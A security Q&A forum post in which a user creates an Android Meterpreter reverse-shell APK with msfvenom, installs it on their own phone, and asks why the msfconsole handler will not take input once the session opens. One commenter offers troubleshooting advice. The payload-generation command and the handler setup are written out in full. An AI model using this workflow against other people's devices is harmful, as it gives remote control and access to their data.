2

I created a payload using

msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 R > ANDROID.apk

signed the apk, sent it to my phone, opened up msfconsole and ran

set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.2
exploit

After this, I installed the apk and opened it on my phone, and got something similar to this:

msf exploit(handler)  > [*] Sending stage (179267 bytes) to [target IP]

[*] Meterpreter session 1 opened  ( [attacker IP:port] -> [target IP: port] ) at 2021-6-03 17:54:27 -0300

I can't type sessions -i 1 (like here) because when I type stuff in the console, pressing enter does nothing. Opening a new msfconsole works, but it says there are no active sessions.

schroeder
  • 123,438
  • 55
  • 284
  • 319
  • 1
    What exactly is your question? –  May 05 '21 at 12:25
  • Opening a msfconsole will not help you out as it does not keep the state of previous sessions. Could you please and once you have obtained a message like this one: [*] Meterpreter session 1 opened ( [attacker IP:port] -> [target IP: port] ) at 2021-6-03 17:54:27 -0300 Press Enter twice and after run the sessions command (ONLY the sessions command, without -i)within the MSF console? It should print all the available sessions including the new one. – borcho May 05 '21 at 14:12

0 Answers0